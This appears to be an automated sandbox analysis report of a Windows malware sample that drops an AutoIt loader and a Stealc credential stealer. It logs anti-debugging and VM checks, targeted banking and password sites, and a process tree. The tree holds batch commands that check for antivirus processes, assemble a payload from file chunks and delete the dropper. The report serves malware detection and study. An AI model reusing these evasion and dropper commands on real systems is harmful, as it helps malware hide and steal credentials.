                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002CCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,15_2_002CCD9F
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002CF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_002CF5D8
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002CF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_002CF735
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002CFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,15_2_002CFA36
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002C3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_002C3CE2
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_00439ED2 FindFirstFileExW,15_2_00439ED2
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,16_2_0040E430
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,16_2_004138B0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,16_2_00414910
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,16_2_0040BE70
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,16_2_004016D0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,16_2_0040DA80
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,16_2_0040F6B0
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,16_2_00414570
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,16_2_0040ED20
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,16_2_0040DE10
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,16_2_00413EA0
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_00275D13 GetVersionExW,GetCurrentProcess,IsWow64Process,FreeLibrary,GetSystemInfo,GetSystemInfo,15_2_00275D13
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\464151Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\464151\Jump to behavior
                    Source: Amcache.hve.19.drBinary or memory string: VMware
                    Source: BKFIJJEG.16.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                    Source: BKFIJJEG.16.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                    Source: BKFIJJEG.16.drBinary or memory string: global block list test formVMware20,11696428655
                    Source: Amcache.hve.19.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Blank.pif, 0000000F.00000002.3346669929.000000000153F000.00000004.00000020.00020000.00000000.sdmp, Blank.pif, 0000000F.00000002.3346669929.00000000014FE000.00000004.00000020.00020000.00000000.sdmp, 1248.tmp.exe, 00000010.00000002.3347473837.0000000000709000.00000004.00000020.00020000.00000000.sdmp, 1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: BKFIJJEG.16.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                    Source: Amcache.hve.19.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: BKFIJJEG.16.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                    Source: 1248.tmp.exe, 00000010.00000002.3347473837.00000000006DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware(
                    Source: Amcache.hve.19.drBinary or memory string: vmci.sys
                    Source: BKFIJJEG.16.drBinary or memory string: AMC password management pageVMware20,11696428655
                    Source: BKFIJJEG.16.drBinary or memory string: tasks.office.comVMware20,11696428655o
                    Source: BKFIJJEG.16.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                    Source: BKFIJJEG.16.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: BKFIJJEG.16.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                    Source: Amcache.hve.19.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.19.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.19.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.19.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: 1248.tmp.exe, 00000010.00000002.3347473837.00000000006DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                    Source: BKFIJJEG.16.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                    Source: Amcache.hve.19.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.19.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.19.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: Blank.pif, 0000000F.00000002.3346669929.00000000014FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
                    Source: Amcache.hve.19.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.19.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.19.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: BKFIJJEG.16.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                    Source: BKFIJJEG.16.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                    Source: Amcache.hve.19.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: BKFIJJEG.16.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                    Source: Amcache.hve.19.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.19.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.19.drBinary or memory string: VMware, Inc.
                    Source: BKFIJJEG.16.drBinary or memory string: discord.comVMware20,11696428655f
                    Source: Amcache.hve.19.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.19.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.19.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: BKFIJJEG.16.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                    Source: Amcache.hve.19.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: BKFIJJEG.16.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                    Source: BKFIJJEG.16.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                    Source: BKFIJJEG.16.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                    Source: BKFIJJEG.16.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                    Source: Amcache.hve.19.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: BKFIJJEG.16.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                    Source: BKFIJJEG.16.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                    Source: BKFIJJEG.16.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                    Source: Amcache.hve.19.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Blank.pif, 0000000F.00000002.3346669929.000000000153F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW#
                    Source: LocalCGIDAAAKJJ.exe, 0000002B.00000002.3338128212.0000000000E12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: BKFIJJEG.16.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                    Source: BKFIJJEG.16.drBinary or memory string: outlook.office.comVMware20,11696428655s
                    Source: BKFIJJEG.16.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                    Source: BKFIJJEG.16.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                    Source: Amcache.hve.19.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                    Source: Amcache.hve.19.drBinary or memory string: vmci.syshbin`
                    Source: BKFIJJEG.16.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                    Source: Amcache.hve.19.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: BKFIJJEG.16.drBinary or memory string: dev.azure.comVMware20,11696428655j
                    Source: Amcache.hve.19.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: BKFIJJEG.16.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                    Source: Amcache.hve.19.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: BKFIJJEG.16.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002D45D5 BlockInput,15_2_002D45D5
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_00288E89 _memset,IsDebuggerPresent,15_2_00288E89
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_00295CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,15_2_00295CAC
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_004045C0 VirtualProtect ?,00000004,00000100,0000000016_2_004045C0
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_0043106F mov eax, dword ptr fs:[00000030h]15_2_0043106F
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_00419750 mov eax, dword ptr fs:[00000030h]16_2_00419750
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002B88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,15_2_002B88CD
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_0028A354 SetUnhandledExceptionFilter,15_2_0028A354
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_0028A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_0028A385
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_0042B513 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_0042B513
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_00411613 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00411613
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_004117A6 SetUnhandledExceptionFilter,15_2_004117A6
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_00410A48 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00410A48
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0041AD48
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_0041CEEA SetUnhandledExceptionFilter,16_2_0041CEEA
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_0041B33A
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C16B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_6C16B66C
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C16B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_6C16B1F7
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_6C31AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_6C31AC62
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeMemory protected: page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell download and execute
                    Source: Yara matchFile source: Process Memory Space: 1248.tmp.exe PID: 6020, type: MEMORYSTR
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifMemory written: C:\Users\user\AppData\Local\Temp\464151\Blank.pif base: 400000 value starts with: 4D5AJump to behavior
                    Searches for specific processes (likely to inject)
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: 16_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,16_2_00419600
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002B9369 LogonUserW,15_2_002B9369
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_00275240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,15_2_00275240
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002C1AC6 SendInput,keybd_event,15_2_002C1AC6
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002C51E2 mouse_event,15_2_002C51E2
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Accepting Accepting.bat & Accepting.batJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 464151Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "DHappenedWestminsterUnexpected" Heat Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Theaters + ..\Keeping + ..\Estimate + ..\Tribute + ..\Nails + ..\Kingdom + ..\New + ..\Tears + ..\Zoo VJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Blank.pif VJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifProcess created: C:\Users\user\AppData\Local\Temp\464151\Blank.pif C:\Users\user\AppData\Local\Temp\464151\Blank.pifJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifProcess created: C:\Users\user\AppData\Local\Temp\1248.tmp.exe "C:\Users\user\AppData\Local\Temp\1248.tmp.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\LocalCGIDAAAKJJ.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe "C:\Users\user\AppData\LocalCGIDAAAKJJ.exe"
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\user\AppData\LocalCGIDAAAKJJ.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 2.2.2.2 -n 1 -w 3000
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002B88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,15_2_002B88CD
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002C4F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,15_2_002C4F1C
                    Source: hlyG1m5UmO.exe, 00000000.00000003.2102681446.0000000002904000.00000004.00000020.00020000.00000000.sdmp, Blank.pif, 0000000B.00000000.2148275702.0000000000316000.00000002.00000001.01000000.00000008.sdmp, Blank.pif, 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: Blank.pifBinary or memory string: Shell_TrayWnd
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_0028885B cpuid 15_2_0028885B
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: EnumSystemLocalesW,15_2_004362B1
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,15_2_0043C4EA
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: GetLocaleInfoW,15_2_004366A4
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: EnumSystemLocalesW,15_2_0043C762
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: EnumSystemLocalesW,15_2_0043C7AD
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: EnumSystemLocalesW,15_2_0043C848
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,15_2_0043C8D5
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: GetLocaleInfoW,15_2_0043CB25
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,15_2_0043CC4E
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: GetLocaleInfoW,15_2_0043CD55
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,15_2_0043CE22
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,16_2_00417B90
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeQueries volume information: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002A0030 GetLocalTime,__swprintf,15_2_002A0030
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_002A0722 GetUserNameW,15_2_002A0722
                    Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pifCode function: 15_2_0029416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,15_2_0029416A
                    Source: C:\Users\user\Desktop\hlyG1m5UmO.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
                    Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: Amcache.hve.19.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.19.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.19.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.19.drBinary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Stealc
                    Source: Yara matchFile source: 16.2.1248.tmp.exe.a00e67.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.1248.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.3.1248.tmp.exe.2330000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.1248.tmp.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.3.1248.tmp.exe.2330000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.1248.tmp.exe.a00e67.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000010.00000002.3346073741.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3348010697.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.3002753873.0000000002330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.3347473837.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 1248.tmp.exe PID: 6020, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
